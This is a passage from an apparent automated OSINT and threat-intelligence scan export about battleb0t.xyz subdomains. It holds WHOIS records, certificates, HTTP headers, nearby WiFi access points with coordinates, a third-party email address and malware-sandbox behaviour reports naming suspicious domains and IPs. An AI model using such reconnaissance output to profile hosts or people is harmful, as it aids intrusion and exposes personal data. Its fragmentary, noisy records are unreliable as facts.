match: "widgets-static.embluemail.com"\n Pattern match: "www.starken.cl"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\7748_1128813663\\auto_open_controller.js]- [targetUID: 00000000-00007748]\n Dropped file: "shopping.js" - Location: [%TEMP%\\7748_1128813663\\shopping.js]- [targetUID: 00000000-00007748]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\7748_1643452734\\adblock_snippet.js]- [targetUID: 00000000-00007748]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\7748_1128813663\\edge_tracking_page_validator.js]- [targetUID: 00000000-00007748]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\7748_1128813663\\shopping_iframe_driver.js]- [targetUID: 00000000-00007748]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\7748_1128813663\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007748]\n Dropped file: "product_page.js" - Location: [%TEMP%\\7748_1128813663\\product_page.js]- [targetUID: 00000000-00007748]\n Dropped file: "edge_driver.js" - Location: [%TEMP%\\7748_1128813663\\edge_driver.js]- [targetUID: 00000000-00007748]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\7748_1128813663\\shoppingfre.js]- [targetUID: 00000000-00007748]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\7748_1128813663\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007748]'}, {u'category': u'Unusual Characteristics', u'origin': u'Network Traffic', u'identifier': u'network-18', u'name': u'Contacts Mail Related Domain Names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/003', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1071.003', u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'"widgets-static.embluemail.com" is probably a mail server'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7748_1643452734\\Part-RU]- [targetUID: 00000000-00007748]'}, {u'category': u'Spy | 34.74.170.74 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | bilikom (Net ID: 00:14:C1:0F:F1:FC) | 40.2024, 29.0398 |
| 2023-05-12 02:54:14 | Web Content | No | Web Spider | 1 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html>
<iframe src="https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe>
</html> | kekw.battleb0t.xyz |
| 2023-05-12 02:44:16 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | www.github.com | 185.199.111.153 |
| 2023-05-12 03:01:15 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.136): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:13 | BGP AS Membership | No | Censys | 0 | 0 | 4 | 0 | None | 13335 | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-ray: 7c5f6051f8c478df-EWR | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gKkAv2ueXH0GbQQgHQUB1ba%2FGC57%2Fw1l33qylJQZwo8rZZSQGe9chbhvY39IMKx8OGwCgg014ANieMLMNm0k2vb6aYv4qeDTvVzmiQmtAm9hGZFwG%2BXVyUTLjJ6w5y8UPVYOV9MG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:18 GMT", "cf-ray": "7c5f6051f8c478df-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Vienna (Net ID: 00:09:5B:B1:9F:16) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | GitHub Category | cdn-185-199-111-153.github.com |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX55155989E (Net ID: 00:01:E3:55:98:9E) | 52.3759, 4.8975 |
| 2023-05-12 03:32:15 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.8:8443 | 188.114.97.0/24 |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00lt00.github.io]
https://www.openphish.com/feed.txt | 00lt00.github.io |
| 2023-05-12 03:33:39 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | eKE>Q
RQEA<
QEQAE
G$rG$
Z?xV
_2H-
-EEO1AE
e.coC
?wX3
QE_1<
QEhO0QE
QEAAE
rGDpyt
cv>myz
kPIiG
X?wV<
\u2v5
Qc>ft1
TtV@I
iY>eI
OYIXf
QPO0QE
P_0QK
2 ?w'
yrW'<
Au$rV7:
eirlI
GZrGQ
?wXRx
iVv5:
DrTty
eIAv$
QsRz<
rVw6J
G$uCU
yJrGU$
kweG$
vGCDoU
rI$wwq
MQIIL
u<rT4
P"ZO2
lkGRy
O<rGi
>:e>:9L
Uy?wF
<rOk$
WrXjPA
eii:<
rTr_i
EST4U
O1Pfg
kG$u<
QEKA!E
QQ-IJ66
2MJ9'
DrTtP
i$un<
4y 2>>
ZIc$q
wRk2G'
drUE\
AuXPOS
DtQA<
iu$pO
RJzQ$tP_1-
DtQAAE
-Q$U-
fO0QE
Cwkww
WS/xw
"J_2H
\rU -d
i7PZG
XZi>e
rT7qX
O2M:O
:eADT
_1-EE
j/"J_
T5/ x
\ebnT
v2Acu
0IZpI
?>?2J
wU-rV
tyubH
-.Kx<
2I<rZ
g\u2ld
EEKE_1<
6g$cy
\uBI?wPO<
GDub:<
"?.?>8
E6Ju!
tIIA1
IRytyq
_Gwq<
rm6?" | https://pics.battleb0t.xyz/images/nomnom.jpg |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +14806242598 | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-cache-status: MISS | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"8c335e8962efa39b56919d96c0b5527b\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=sZlRfK%2B18hvKHsoLJ40BkYB4lHX60aBHph6G1vTBEuSHhMJnpf00BL3raGeVno%2B26HQG4%2BW6ctKHKalYOpr00wtWKpk2uf4%2BwHegHXg02iluCPfF38%2B%2FPJX8%2B4PjVD4UW5HjHU9e\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605affff189d-EWR"} |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Officewirelessnew (Net ID: 00:13:10:7F:DA:06) | 32.8608, -79.9746 |
| 2023-05-12 03:03:51 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | james-gamboa.github.io | 185.199.110.153 |
| 2023-05-12 02:44:31 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3037::6815:470e | vscode.battleb0t.xyz |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 74 | 0 | 2 | 0 | None | 35.229.48.116 | pics.battleb0t.xyz |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 2 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/reveloder.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | HOGWARTSSOWAW (Net ID: D4:B2:7A:F3:1A:42) | 37.751, -97.822 |
| 2023-05-12 02:55:15 | Operating System | No | Censys | 0 | 0 | 3 | 0 | None | Ubuntu Linux | 165.232.113.85 |
| 2023-05-12 02:55:21 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Content-Length: 46
Content-Type: application/json; charset=UTF-8
Date: <REDACTED>
Server: Caddy
Vary: Origin
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
| 207.154.228.169 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:61:24:2C) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:54:20 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"Content_Length": ["0"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Server": ["Netlify"], "X_Nf_Request_Id": ["01H04BK0BS0X0MXB72Y8AY7JTF"], "Date": ["<REDACTED>"]} | 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:23:11 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.1:443 | 188.114.96.0/24 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:88:80:c3:9c:e1:f5:05:d4:ce:eb:a7:b8:8b:96:69:16:e7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 13:22:33 2023 GMT
Not After : Jun 25 13:22:32 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:bd:d7:3e:a0:44:3f:74:66:1e:5f:b3:2a:36:ad:
5d:f6:03:6b:7c:a2:a0:47:3a:fb:01:98:b1:8f:cc:
c2:91:5e:2e:be:9e:37:09:fc:a3:ca:c0:ce:59:08:
31:20:c4:42:4f:e2:31:60:c4:be:0d:a3:d0:7e:5f:
84:84:43:02:3b:79:0a:56:99:86:35:5f:ee:ec:21:
8b:06:16:ef:3b:0d:ec:b0:a6:01:ca:7c:9f:ae:0e:
21:80:e7:f6:f2:e9:02:7d:5d:df:7d:70:dd:dd:93:
90:c2:a3:7e:80:f6:ad:ed:f9:15:f2:c4:37:d6:ad:
4b:89:76:da:d5:eb:7c:ff:f8:44:95:84:d6:c3:19:
7b:70:37:49:42:e5:fe:7d:2c:bd:de:bc:2b:99:c0:
a4:9b:15:4f:d7:2f:f2:c7:b5:99:6b:e4:41:8f:a5:
3f:0f:85:1f:6c:4e:91:90:da:48:18:85:c0:a8:f9:
5b:43:e7:ba:4b:5b:17:69:9f:6a:26:1d:48:87:97:
a5:b7:a2:63:4f:58:3b:87:61:7a:53:e1:17:71:98:
3f:e6:14:b4:56:34:1d:a0:89:72:33:eb:2c:c5:36:
a0:27:b1:d2:f8:c6:e3:8f:79:67:b5:d6:8a:ec:f1:
bd:9b:ad:69:c1:3b:50:1a:84:e7:cb:cf:d0:71:43:
d2:3b:49:a5:27:2e:d1:3d:b9:18:82:02:4d:8f:b0:
bb:df:42:cf:64:aa:67:dc:2f:01:5a:31:2e:da:fb:
b2:d7:58:03:8e:aa:3f:4c:ca:46:eb:1f:d0:ce:c6:
8c:fe:3d:b8:0f:99:bb:cf:51:78:2e:f4:7a:df:b5:
ee:fc:f9:a7:d1:b7:2b:1b:c6:17:72:43:c6:34:57:
a1:d1:1d:f1:0c:8c:8a:f9:1d:27:7f:56:dc:e1:0f:
9b:fe:d2:eb:01:b7:80:25:0c:68:e6:38:d2:70:20:
00:db:75:51:f4:50:11:95:65:85:63:dc:a6:18:f5:
d8:1d:55:65:7b:fd:4b:42:c9:e0:e0:5b:99:47:62:
96:1e:29:13:2d:13:79:08:f1:19:4e:83:44:d1:b3:
1e:52:55:c8:85:91:ec:6f:74:02:73:b9:35:b5:4d:
32:70:2b:a5:40:65:f3:30:c9:2a:75:4a:fc:26:5e:
25:6b:0f:f0:6e:21:a9:a3:b3:fc:a9:24:00:c1:d2:
4b:2c:3d:0a:55:12:77:ec:d9:f9:b2:f1:bc:2c:ec:
53:cb:52:84:47:80:24:42:33:90:05:e1:7c:3a:b2:
37:ee:d5:9d:71:10:25:16:47:45:30:42:37:7d:df:
2f:44:a5:75:17:fd:0c:59:0a:14:5f:4a:c6:9e:57:
1c:e4:cb
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
EE:9A:7C:45:9F:8D:28:F8:82:DE:AE:58:A9:48:6F:F4:DA:ED:01:D8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Mar 27 14:22:33.221 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:4F:44:FF:23:78:0C:0A:43:E7:DD:21:00:
C4:D1:3F:C3:F1:0D:AC:F3:42:E5:53:7F:E9:12:DC:C9:
41:E7:31:AA:02:20:29:7B:10:84:21:42:A6:BE:66:D5:
B5:62:0E:26:B3:36:1B:B2:1F:F3:F6:F2:FA:99:68:0E:
07:72:EE:35:ED:D1
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 27 14:22:33.315 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:42:E7:DB:8E:AD:39:D9:72:0F:22:03:49:
17:50:EA:AF:42:B9:A0:A7:C7:8A:2E:5E:9D:4B:70:15:
12:36:C9:8C:02:20:70:3E:22:0D:CB:C1:8E:23:7B:D4:
20:A7:55:2C:92:70:7B:00:76:E5:77:1A:32:2B:D4:BB:
A7:E5:BA:F4:CD:50
Signature Algorithm: sha256WithRSAEncryption
57:fc:9c:cc:34:05:33:b1:85:6f:05:be:91:2e:7e:dc:3a:5c:
d5:70:d3:bc:68:4c:e5:a6:0e:93:49:4c:b2:24:ea:22:6c:53:
1d:7b:22:13:3e:ae:d1:e9:17:1e:71:5b:5a:e3:c7:59:55:db:
f6:e5:0f:f7:75:49:45:9c:0b:d7:10:90:aa:9f:57:81:e1:bd:
95:72:69:1a:6a:68:d7:6f:63:d3:d0:c5:74:e1:f6:05:01:8e:
de:8a:f2:cc:6b:66:ed:6a:cf:b9:08:1c:41:e7:01:36:39:29:
3c:ce:b9:d5:71:4f:4a:e1:92:00:38:14:85:83:1b:78:d3:52:
4d:9c:dc:62:c1:ff:3e:c9:3b:f4:1b:55:62:89:22:10:52:f5:
2f:09:06:3f:72:98:2a:6c:4f:3e:41:69:f0:90:3d:75:67:0f:
5f:95:04:35:0b:5e:5e:d4:29:7e:f0:df:9c:7f:86:0a:bf:f4:
66:2a:ad:8c:e5:22:e0:2d:ff:f7:04:45:a4:bb:31:8c:99:a5:
16:da:1d:eb:c6:c4:fa:e4:70:84:9c:c6:93:f8:76:5a:3a:48:
95:d4:c6:4d:4c:36:eb:b7:e5:52:69:e6:7d:0f:b5:d1:ab:44:
b8:82:08:6c:6a:ef:3e:4f:de:99:6f:c7:4e:1e:39:17:26:6f:
a6:80:e5:c2
| battleb0t.xyz |
| 2023-05-12 03:00:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | pelorriaga@insumetperu.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 4, u'threat_score': None, u'compromised_hosts': [u'104.196.30.220', u'172.67.128.152'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://regclickonetwoget.com/?qs=SVI3JJKW8KWM1XICHGSM-41fb87317e87a7486e', u'signatures': [{u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-101', u'name': u'Found API related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"MaxConnectionsPerServer" (Indicator: "MaxConnectionsPerServer") in Source: 00000000-00002536-00000BCA-24571201\n "MaxConnectionsPer1_0Server" (Indicator: "MaxConnectionsPer1_0Server") in Source: 00000000-00002536-00000BCA-24572342'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-2', u'name': u'An application crash occurred', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 9, u'description': u'Report process "WerFault.exe" was created by "rundll32.exe"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3360 -s 132" (UID: 00000000-00003436)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"e1.o.lencr.org"\n "facesupdates.com"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "WerFault.exe" (UID: 00000000-00003436) was launched with missing environment variables: "PATH"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFF57.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_9e8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "DBWinMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_9e8_IESQMMUTEX_0_303"\n "IsoScope_9e8_IESQMMUTEX_0_519"\n "IsoScope_9e8_IE_EarlyTabStart_0xd54_Mutex"\n "IsoScope_9e8_IESQMMUTEX_0_331"\n "IsoScope_9e8_ConnHashTable<2536>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2536"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "172.67.128.152:443"\n "23.32.45.191:80"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3360 -s 132" (UID: 00000000-00003436)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabFF56.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00000812]\n "CLXG2BM2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CLXG2BM2.txt]- [targetUID: 00000000-00002536]\n "CabFF56.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\CabFF56.tmp]- [targetUID: 00000000-00000812]\n "BBB0B9C986171FE6F65C60CFDD8B124F" has type "data"- Location: 